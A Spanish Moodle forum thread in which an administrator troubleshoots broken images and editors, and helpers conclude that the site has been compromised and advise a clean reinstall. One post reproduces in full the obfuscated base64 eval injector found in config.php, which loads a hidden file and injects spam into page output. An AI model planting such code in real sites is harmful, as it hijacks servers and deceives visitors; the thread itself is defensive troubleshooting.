problemas para cargar módulos e imágenes

problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Número de respuestas: 26
Hola
tengo un problema intermitente: la plataforma ha dejado de cargar las imágenes y los módulos de edición de imágenes y HTML.
Cuando pongo el servidor en modo debug me da el siguiente error


$CFG->eaccelerator is set to true but the required functions are not available. You need to have either eaccelerator or turckmmcache extensions installed, compiled with the shmem keys option enabled.
  • line 29 of lib/eaccelerator.class.php: call to debugging()
  • line 358 of lib/setuplib.php: call to eaccelerator->eaccelerator()
  • line 348 of lib/setup.php: call to init_eaccelerator()
  • line 22 of config.php: call to require_once()
  • line 24 of admin/index.php: call to require_once()
Error initialising eaccelerator cache
  • line 349 of lib/setup.php: call to debugging()
  • line 22 of config.php: call to require_once()
  • line 24 of admin/index.php: call to require_once()
el soporte técnico del servidor dice que es un problema en el archivo file.php. Se han corregido otros errores que había, pero ese persiste.

Este problema me lo hacía con la versión 1.8. Se arregló haciendo un restoreado de un backup, pero hace una semana, volvió a aparecer. Hemos actualizado la plataforma a la versión 1.9.6+ y continúa la misma situación.

Alguien tiene alguna idea de qué puede estar pasando?
gracias desde ya por las respuestas.
danielk

Promedio de valoraciones: -
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Raul Garcia Canet -
Hola Daniel,

Pueden ser 3 cosas:
1.- Tienes activado el uso de eaccelrator en tu moodle (si no lo usas, descativalo)
No recuerdo ahora dónde está esa opción, pero si usas el cuadro "Buscar" con el término eaccelerator del bloque de Administración lo encontarrás facilmente.

2.- Se ha recompilado eaccelerator y se han modificado las opciones de compilación, conretamente,s e ha eliminado el parámetro "sharedmem". El administrador de servidor debe recompilarlo añadiendo esta opcion.

3.- Se ha cambiado la versión de PHP i no se ha recompilado el módulo de eaccelerator. Este módulo debe recompilarse cada vez que se actualice php.

Hasta pronto,
Salu2
J.Raul (juagarc4) guay
En respuesta a Raul Garcia Canet

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Hola Juan Raúl. Haciendo pruebas y consultando con el soporte técnico del servidor, llego a la conclusión de que el error que transcribí antes, viene de tener activado eaccelerator, cosa que desactivé (y obviamente dejó de indicarlo con la función debugger activada.

Sin embargo, sigue sin cargar las imágenes y los módulos editores y html en los foros.

Tiene algo que ver file.php, como me insiste el soporte técnico del servidor?

He actualizado el servidor local de prueba local y esto no sucede, aun cuando no encuentro la forma de cargar la base de datos del servidor de producción.
saludos
danielk
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Raul Garcia Canet -
Hola David,
El fichero file.php es el encargado de procesar los ficheros, tando de recursos, como de imágenes a cargar. Cuando es una imágen, se hace uso, en otra libreria de las funciones de las librerias graficas "GD" (que deben estar cargadas en el servidor).

Consulta la sección "Servidor->Información de PHP" y busca en la página la sección "gd" a ver si contiene algo parecido a esto. Sino, es que no tienes las librerías GD instaladas y por eso no te muestra las imágenes. En ese caso,
dile a tu administrador que incluya el soporte de GD en el PHP.

gd

GD Support enabled
GD Version bundled (2.0.34 compatible)
FreeType Support enabled
FreeType Linkage with freetype
FreeType Version 2.3.9
T1Lib Support enabled
GIF Read Support enabled
GIF Create Support enabled
JPG Support enabled
PNG Support enabled
WBMP Support enabled
XBM Support enabled

Si estan cargadas y ya has deshabiiltado el eaccelerator en Moodle, prueba a activar de nuevo la depuración a ver si arroja algún otro error. Y, en la sección "Servidor->Rutas del Sistema", comprueba si te detecta la versión de GD que tienes instalada.

Hasta pronto,
Salu2,
J. Raul (juagarc4) guay
En respuesta a Raul Garcia Canet

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Gracias Juan Raúl

La única diferencia que veo es que en el servidor la versión de FreeType es 2.1.9 en lugar de 2.3.9.
Activado el debugger no arroja ningún error y Rutas del sistema detecta la versión GD 2.x que es la de default.

Evidentemente no es ese el problema, porque sigo sin poder ver las imágenes y sin que cargue los módulos de edición y los de HTML
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Raul Garcia Canet -
Hola David,

Comprueba que el ficehro "config.php" termina con "?>" y que después de este signo, no hay ningún espacio en blanco, ni ningúna línea en blanco.
Abre el ficehro con un editor de texto llano (notepad).

Hasta pronto,
Salu2

J. Raul (juagarc4) guay
En respuesta a Raul Garcia Canet

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
todo está ok, Juan Raúl. el config.php tenía una línea de más en blanco al finalizar, pero sigue sin cargar las imágenes ni los módulos editores.
¿qué otra cuestión será?
Saludos
daniel (no david, jaja)
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Raul Garcia Canet -
Ups, perdón por el despiste Daniel,
Ya se sabe que leer tres foros a la vez no trae nada bueno lengua fuera

Respecto al tema que nos ocupa...pensativo, me quedo sin ideas, a ver si alguien se anima a dar alguna pista porque ya no caigo que pueda ser.

Lo de las imagenes pase que sea por el fichero file.php (si le habéis hecho modificaciones importantes) pero lo de los "módulos editores"...no acabo de entender el concepto. ¿Te refieres a los editores HTMLo a los cuadros de "Agregar Recurso", "Agregar Actividad" que aparecen al pulsar "Activar Edición"?

¿Que versión de IE usas? ¿o usas Firefox?
Se que el IE6 tiene problemas con Moodle, debido al AJAX.

No se me ocurre nada más...de momento.

Lo siento, pensaré alguna otra cosa.
Hasta pronto,
Salu2
J. Raul (juagarc4) guay



En respuesta a Raul Garcia Canet

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Hola Juan Raúl
Yo también estoy perdido, porque además no sé cómo guiar al soporte técnico del servidor.
Estoy seguro que el problema es allí, porque con la misma versión de moodle, pero en el servidor local no tengo esos problemas. He puesto la misma versión y el mismo theme y veo todas las imágens y tengo los módulos de html (en los foros) y los módulos para cargar imágenes, cosa que en la plataforma de producción no veo.
En la plataforma de producción, cuando entro con edición activada, solamente me muestra el código. No tiene una versión html para el texto ni la opción de poder recargar una imagen.

Otro problema es que me desconfigura todos los documentos que tengo cargados. No puedo ver ni .doc, ni .rtf, ni ,pdf porque los abre algo así como en código ascii.

Uso Firefox y Chrome. Con IE me muestra los recuadros de las imágenes faltantes, pero tampoco las carga. Definitivamente no es un problema del explorador, porque si no no lo vería en la plataforma de prueba.

No sé cómo funcionan los enlaces entre foros ¿te parece que deje las preguntas en otro foro?
Saludos cordiales
danielk
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de David Hernández -
Hola Daniel,

Creo que hay varios problemas que no necesariamente deben estar relacionados:

1) De las imágenes

Pues si Moodle tiene lo de GD2 activado en: Administración del sitio -> Servidor ->
Rutas del sistema

Y también sale bien la revisión del entorno en: Administración del sitio -> Servidor ->
Entorno

Entonces quizá el asunto se solucione vía los "slasharguments":

Administración del sitio -> Servidor HTTP -> Quitar la "palomita" de "Uso argumentos
'slash' "

2) De los archivos que se presentan como ASCII (caracteres raros)

Eso, como yo he visto, sólo se presenta si hay un espacio o interlínea o caracter
o cualquier cosa luego del tag de cierre de PHP ?>

Pero dices que eso ya lo revisaste.

Aquí la pregunta sería cómo lo hiciste.

Es decir, abriste el archivo con un editor de texto en tu PC y luego lo subiste,
o usaste el módulo de edición de archivos ofrecido por tu panel de control
del servidor o cómo.

Otra cosa, al menos en el server GNU/Linux que yo tengo, el archivo
"config.php" está codificado en ANSI.

No me acuerdo bien, pero hace tiempo había unos archivos que se editaron
y se les cambio la codificación a UTF-8, y Moodle empezó a funcionar medio
"raro", hasta que se cambio a ANSI.

No digo que sea esto, pero igual y sirve de algo.

Otra cosa que se me ocurre, es que tu carpeta MoodleData o las carpetas
de los cursos, no tengan permisos de lectura y por eso no se puedan leer
las imágenes, pero dices que los archivos sí se leen (mal, pero se leen).

Entonces esta idea como que queda deshechada, aunque la menciono por
si acaso.

3) Lo que no queda muy claro (al menos para mi), es a qué te refieres con:
"los módulos de html (en los foros) y los módulos para cargar imágenes"

¿Es el editor HTML o qué es eso?

¿Puedes poner una imagen de cómo se ve la página con el error?

Saludos
En respuesta a David Hernández

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Hola David
Gracias por ayudarnos a pensar este tema! Voy contestando paso a paso:

1) De las imágenes

Pues si Moodle tiene lo de GD2 activado en: Administración del sitio -> Servidor ->
Rutas del sistema

Está ok

Y también sale bien la revisión del entorno en: Administración del sitio -> Servidor ->
Entorno
En la revisión del entorno en: Administración del sitio -> Servidor ->Entorno , respecto a Unicode, me aparece este mensaje:
Es necesario que almacene todos sus datos en formato Unicode (UTF-8). Las instalaciones nuevas deberían ejecutarse en bases de datos cuyo juego de caracteres por defecto fuera Unicode. Si está realizando una actualización, debería llevar a cabo el proceso de migración UTF-8 (vea al respecto la página de Administración).

Ya le he consultado al soporte del servidor y me dice que desde mooddle le dijeron que esto era opcional. Volví a ponerle una consulta, exactamente como la he transcripto arriba.

Entonces quizá el asunto se solucione vía los "slasharguments":

Administración del sitio -> Servidor HTTP -> Quitar la "palomita" de "Uso argumentos
'slash' "
Aquí estaba sin la "palomita". Le puse el check y nada cambió. No es por ahí, parece.

2) De los archivos que se presentan como ASCII (caracteres raros)

Eso, como yo he visto, sólo se presenta si hay un espacio o interlínea o caracter
o cualquier cosa luego del tag de cierre de PHP ?>

Pero dices que eso ya lo revisaste.

No es exactamente ASCII. Al final te paso el enlace de la imagen que he subido de cómo se ve un documento rtf

Aquí la pregunta sería cómo lo hiciste.


Es decir, abriste el archivo con un editor de texto en tu PC y luego lo subiste,
o usaste el módulo de edición de archivos ofrecido por tu panel de control
del servidor o cómo.
Bajé con el FileZilla el archivo de la plataforma que está en línea. Lo abrí con el editor de txt (bloc de notas) y lo volví a subir vía FileZila, sobreescribiendo el anterior.


Otra cosa, al menos en el server GNU/Linux que yo tengo, el archivo
"config.php" está codificado en ANSI.

No me acuerdo bien, pero hace tiempo había unos archivos que se editaron
y se les cambio la codificación a UTF-8, y Moodle empezó a funcionar medio
"raro", hasta que se cambio a ANSI.

No digo que sea esto, pero igual y sirve de algo.

No sé qué debo mirar al respecto...

Otra cosa que se me ocurre, es que tu carpeta MoodleData o las carpetas
de los cursos, no tengan permisos de lectura y por eso no se puedan leer
las imágenes, pero dices que los archivos sí se leen (mal, pero se leen).

Entonces esta idea como que queda deshechada, aunque la menciono por
si acaso.

La carpeta no se llama moodledata (porque en alguna versión anterior el instalador de moodle la nombró de otra manera) y todos los permisos son 777

3) Lo que no queda muy claro (al menos para mi), es a qué te refieres con:
"los módulos de html (en los foros) y los módulos para cargar imágenes"

¿Es el editor HTML o qué es eso?

¿Puedes poner una imagen de cómo se ve la página con el error?

Te paso tres enlaces para ver las imágenes de los fallos:
Imágenes que no cargan: Están señaladas con unas elipses amarillas. No son todas, sino las que yo incorporo en un curso y los íconos que van al lado de los usuarios. La podés descargar desde:

Cómo se ve, en el modo edición, sin que se carguen los módulos html y editores de img: La podés descargar desde:

Cómo se ve un documento desconfigurado, que ha sido subido con la extensión .rtf: La podés descargar desde:


Seguimos
saludos!
danielk


En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Raul Garcia Canet -
Hola Daniel,

Ok, creo que ya está claro.

Siento decirte que has sufrido el famoso ataque de XSS (Cross-site Scripting)
Hace poco también lo sufrí. En su primera versión, el ataque creaba varios ficheros php, que modificaban las cabeceras de los ficheros. Pero posteriormente, en una segunda versión, se han metio también "dentro" de los archivos y los han destrozado (como en tu imagen del fichero), incluyendo doc's y pdf's.

La solución: Una instalación limpia de los archivos moodle. Conservé los datos de la base de datos(no estaban afectados), pero tuve que reemplazar todos los ficheros de moodle.
Para comprobarlo, abre alguno(prueba con varios) de los ficheros con extensión php de moodle y fíjate si en la cabecera aparece algo como:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvY.......CdkZ29iaCcpO319fQ==')); ?>


En este enlace tienes más info al respecto:
http://moodle.org/mod/forum/discuss.php?d=116174

Sí, has dicho que habéis hecho una actualización de moodle, pero, ¿cómo la habéis hecho, sobreescribiendo los archivos(no es una solución válida) o en una carpeta nueva? Esa es la clave.
En caso de ser una carpeta nueva, ¿habéis eliminado la antigua?

A mi me pasó que, en un primer ataque, eliminé los códigos raros de los ficheros php (un currazo impresioante), pero de repente, a los dos días, estaba otra vez igual, con lo que intuyo (no lo he visto en detalle) que hay algun script insertado en alguna parte que regenera el ataque.
Por eso, al final tuve que hacer una instalación nueva.

Mis Recomendaciónes:

1.- Guardar el fichero config.php.

2.- Haz copia de Seguridad de la Base de Datos y si no la tienes en UTF-8, deberías migrarla cuanto antes.

3.- Comprime tu carpeta moodle en un zip (recuerda coger el tema que uses y revísalo antes de ponerlos en tu nuevo moodle por si estuvieran infectados los ficheros) e instala una versión nueva de moodle.
No hace falta usar el instalador.
Sólo descomprime la carpeta en el servidor y copia el fichero config.php que te has guardado o modifca el config-dist.php que trae moodle
con los parámetros adecuados. Renombra config-dist.php a config.php

4.- Si la Base de Datos ya está en UTF-8 accede a tu sitio y deja que moodle haga las actualizaciones pertinentes.

5.- Pon la carpeta moodle y todo su contenido con permisos 555(r-x) (lectura,nada,ejecución)

6.- Intenta acceder a tu nuevo moodle.

7.- Si todo funciona, elimina la carpeta moodle comprimida.

Lamentablemente, los ficheros no los vas a poder recuperar, deberás subirlos de nuevo. Si lo haces con el mismo nombre y en el mismo lugar, no tendrás que tocar los recursos. Eso lo puedes hacer una vez hayas terminado.

Siento no tener mejores notícias, pero es lo que a mi me pasó y lo que observo al ver tu fichero modificado.

Si alguien más tiene otra visión del tema, que la comparta porque puedo haberme equivocado.

Hasta pronto,
Salu2
J. Raul (juagarc4) guay

P.D: Si habéis realizado modificaciones en el código de moodle para añadir funcionalidades o coasa así, deberéis tener esto en cuenta para volver a apicarlas a la nueva instalación.
En respuesta a Raul Garcia Canet

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Gracias J. Raúl. Luego voy a mirar detenidamente lo que me dices y poner manos a la obra. Por ahora, evidentemente como producto de la activación de esta mañana de la "palomita" (será así?) he visto con sorpresa que carga algunas imágenes y una parte del módulo de edición. Pero ya los documentos aparecen accesibles.
saludos cordiales
danielk
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Raul Garcia Canet -
Hola Daniel,

Me alegro de que te vaya funcionando y espero haberme equivocado (eso parece) en mi diagnóstico.

Hasta pronto,
Salu2
J. Raul (juagrac4) guay
En respuesta a Raul Garcia Canet

Re: problemas para cargar módulos e imágenes

de David Hernández -
Hola Daniel,

Yo creo que Raúl no se equivoca.

Mi impresión, sobre todo de la última imagen, es que sí has sido atacado.

Si te das cuenta, el archivo RTF tiene escritas líneas HTML que generaron
una serie de links muy larga, numerados consecutivamente.

Y van de "caym=0" hasta no sé cuánto.

Y todo dice que si quieres empleo acá o bienes raíces allá o lo que sea.

En mi opinión esto indica que alguien ejecutó código en tu server y pues
te tocó a ti la afectación.

Ahora, entrando al terreno de la mera especulación, según he leído desde
hace un rato, el problema puede no estar en tu Moodle.

Esto lo digo por dos aspectos que suenan medio "extraño".

Si tu plataforma fue atacada y la actualizaste correctamente (no sólo sobre
escribiendo los archivos como acotó Raúl, sino siguiendo el proceso pertinente
descrito aquí), entonces el mal funcionamiento se hubiera acabado.

Al menos eso indicaría la "teoría".

Pero persisten las cosas.

Además, pienso que tú no le habías quitado la palomita a los slasharguments.

Por default Moodle la tiene activada. Si no fuiste tú, ¿quién fue?

¿Hay otro administrador? Como dije antes, ya estamos en el terreno de la
especulación

Bien, una posibilidad es que el ataque le haya entrado al servidor por otro lado (no
por tu Moodle), y pues se afectó tu plataforma.

Eso, considerando que todos tus archivos PHP son "nuevos" (están limpios de
código malicioso), y que tu "config.php" no incluye nada extraño.

Aunque leyendo un mensaje de los posts en inglés de Iñaki, una fuente
de ataque potencial está en los archivos de idioma. Verifíca su contenido,
a ver si es por ahí, y también checa que sólo sean de lectura (no escritura,
no ejecución).

Finalmente, yo haría lo que dice Raúl (prácticamente es volver a empezar, aunque
con ciertos pasos ya dados, como el contar con una base de datos intacta).

Lo que no es nada bueno, es que tu base de datos esté en un cotejamiento
distinto a UTF-8. Si es así, antes de reinstalar todo, pásala a UTF-8.

Alcanzo a entender que tu proveedor te dice que lo de UTF-8 es opcional. Eso
no es cierto, no es así, es totalmente obligatorio, me parece que desde la
versión 1.7+

Y bueno, si no tienes demasiado material, quizá valdría la pena dedicarle un fin
de semana a hacer "copy-paste", para crear los cursos de vuelta y tener una
instalación totalmente nueva.

Saludos
En respuesta a David Hernández

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Gracias, David. Tengo que encontrar el momento para poder hacer todo ese cambio. Mientras tanto pregunto: El config.php en la versión 1.9.6 tiene un bloque de código al empezar?
No lo tiene el de la instalación local, pero sí lo tiene el de producción y nunca lo había visto en otras versiones.

es esto una clave de seguridad u otra cosa?:
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9kYW5pZWxrL3B1YmxpY19odG1sL2NvbnN1bHRvcmEvd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zL2lubGluZXBvcHVwcy9za2lucy9jbGVhcmxvb2tzMi9pbWcvbWRsX3V0Zi5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9kYW5pZWxrL3B1YmxpY19odG1sL2NvbnN1bHRvcmEvd3AtaW5jbHVkZXMvanMvdGlueW1jZS9wbHVnaW5zL2lubGluZXBvcHVwcy9za2lucy9jbGVhcmxvb2tzMi9pbWcvbWRsX3V0Zi5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

Saludos
danielk
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de David Hernández -
Hola Daniel,

Esto confirma que tu plataforma está "intervenida" (por decirlo así).

Lo primero que debes hacer es borrar esa línea y darle a tu "config.php"
permisos de sólo lectura para ti como propietario del archivo y para otros.

En el post con el mensaje de Iñaki, se trata el problema exactamente de
ese ataque

Si puedes, léelo completo, aunque esté bastante largo.

Según concluyo, el ataque no entra por Moodle, sino por otra aplicación
(a lo mejor otro cliente del servidor).

Si no estoy mal, en el post de referencia se habla de que el código
malicioso entró por Joomla!, y luego se pasó a Moodle (o algo así).

Yo creo que debes seguir las medidas indicadas por Raúl a la brevedad.

Es decir, creo que es peor mantener la plataforma en operación, que suspender
el servicio, aunque tengas usuarios trabajando.

Si el problema persiste, yo creo que debes cambiar de proveedor, aunque
coméntale a ver qué puede hacer.

Saludos
En respuesta a David Hernández

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Hola Lamentablemente parece que el problema es grave.
No puedo reinstalar moodle. Suceden cosas no esperadas. He subido el moodle-weekly-tgz tal como lo descargué del sitio oficial.

Compacté la carpeta anterior de moodle y borré la versión que quedaba sin compactar (lo que sería el original).
Cuando descomprimo el archivo de moodle, solamente descomprime una parte:

moodle/
moodle/search/
moodle/search/update.php
moodle/search/delete.php
moodle/search/cron.php
moodle/search/documents/
moodle/search/documents/user_document.php
moodle/search/documents/data_document.php
moodle/search/documents/physical_ppt.php
moodle/search/documents/chat_document.php
moodle/search/documents/physical_doc.php
moodle/search/documents/glossary_document.php
moodle/search/documents/physical_odt.php
moodle/search/documents/assignment_document.php
moodle/search/documents/physical_txt.php
moodle/search/documents/physical_htm.php
moodle/search/documents/document.php
moodle/search/documents/forum_document.php
moodle/search/documents/wiki_document.php
moodle/search/documents/physical_pdf.php
moo

con lo cual, cuando intento ingresar no puedo.
La otra cosa extraña es que me genera un config.php con todos los datos, sin que yo lo haya subido.

Qué puede estar sucediendo? que algún otro archivo infectado no permita que el proeso de instalación se lleve a cabo?

He hecho esta operación varias veces y siempre el reporte de lo que se descomprime es diferente
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Raul Garcia Canet -
Hola Daniel,
Es posibe que el problema de la descomrpesión esté en tu hosting.
Prueba descomprimiendo la carpeta en local y subiéndola medinate filezilla o algun otro cliente FTP. Eso es lo que yo hago siempre y me funciona. No deberías tener problemas haciéndolo de ese modo.
Comprueba también que no te hayas quedado sin espacio en el hosting.

Cualquier cosa que necesites, aquí estamos, ¿ok?.
Hasta pronto,
Salu2.
J. Raul (juagarc4) guay

En respuesta a Raul Garcia Canet

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Hola Juan Carlos
Bueno, finalmente volvi a tener la plataforma en línea. Creo haber seguido los pasos que me indicaron, pero todavía persisten algunos problemas.
No se cargan las imágenes de los avatares y no se cargan los módulos de edición, más que parcialmente.
Adjunto una imagen en la que se ve, en la parte superior, que solamente se cargan tres elementos del módulo de edición

Saludos cordiales!
danielk
Adjunto moduloedicion.gif
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Carlos Bravo Reyes -
Daniel
Una pregunta el problema que describes se "ve" desde otro tipo de proveedor de Internet?
Saludos
En respuesta a Carlos Bravo Reyes

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Buena pregunta, Carlos. Mañana iré a comprobar eso en un locutorio.

En realidad me apresuré a decir que ya se restableció todo. Solamente uno de los cursos me permitía ver las imágenes. Cuando le cambié los permisos a la carpeta moodle, de 755 a 555 (directorios y ficheros), también dejé de ver las que veía.

Volví a cambiar los permisos, dejando en 555 los ficheros y reasignando 755 a los directorios, pero no se restableció.

Revisé el config para ver si estaba contaminado o tenía algún espacio o línea en blanco y está en orden.

Mi conclusión es que con la instalación actualizada estoy en la misma situación que antes del ataque. ¿habrá algo que haya quedado contaminado? ¿dónde debería buscar? Una de las diferencias que noto es que al descomprimir el archivo de moodle, no se generó la carpeta moodledata, que antes se instalaba en el mismo nivel de la carpeta moodle, aunque la que yo uso tiene otro nombre.

Como no se cargan los módulos de html enriquecido, no puedo revisar las rutas de las imágenes para ver si son las correctas.

Saludos desde Rosario
Argentina
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Hola Carlos:
He revisado cómo se veía desde un proveedor externo el sitio y era exactamente igual, lo que me lleva a descartar que el problema sea la conexión.

Misteriosamente, esta mañana aparecieron funcionando algunas cosas: las imgenes se cargaban. No así los avatares, cosa que solucioné "quitando la palomita" de los slash arguments.

Cuando reviso los documentos, ya no parecen tener problemas de lectura.

El único problema que no encuentro cómo solucionar es la carga de los módulos de edición (la imagen que subí hace unos días sigue siendo así).

Comento algo, por si eso significa una pista: tengo puestas algunas imágenes dentro del recurso "etiquetas" y las veo deformadas. No puedo reemplazarlas porque no tengo acceso al módulo que me permite administrar eso.

Es lo que decía en el mensaje anterior.

Saludos y gracias desde ya por pensar conmigo
danielk
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Carlos Bravo Reyes -
Daniel
Comentaba lo del proveedor de Internet, pues por esos días me pasaba que acceder
a mis sitios desde mi casa era casi imposible, cuando ingresaba no había imágenes y los temas en blanco. En la Univ, no pasaba estoy no tenía reporte de otras personas, me quejé al servicio de Internet y como por arte de "magia" todo volvió a la normalidad.

En el caso de las imágenes que indicas se me ocurre que el tamaño de las mismas puede ser mayor del admitido. Puedes borrar esas imágenes por FTP, solo averigua la ruta del archivo donde está alojada y la borras desde ahí.

Saludos
En respuesta a Carlos Bravo Reyes

Re: problemas para cargar módulos e imágenes

de Daniel I. Krichman -
Gracias, Carlos. Yo también cada tanto me encuentro con esos "misterios" que poco ayudan a comprender las lógicas de los problemas. Respecto a las imágenes no tienen grandes tamaños (7/8k), de manera que no es un problema de inadmisibilidad.

Tienes alguna idea de dónde rastrear el problema de que no se carga el html enriquecido? como se muestra en la imagen
Adjunto moduloedicion.gif
En respuesta a Daniel I. Krichman

Re: problemas para cargar módulos e imágenes

de Carlos Bravo Reyes -
Daniel

Cometí un error en el post anterior, cuando escribí tamaño debí especificar el tamaño de la imagen y no el peso de la misma. En relación a que no se ve todo el editor HTML no tengo la menor idea. En mi caso me pasa cuando no logro conectarme adecuadamente.
Supongo que habrás probado con otro navegador y limpias la caché periódicamente. Es un caso especial, pero vamos aprendiendo a cómo resolverlo.
Saludos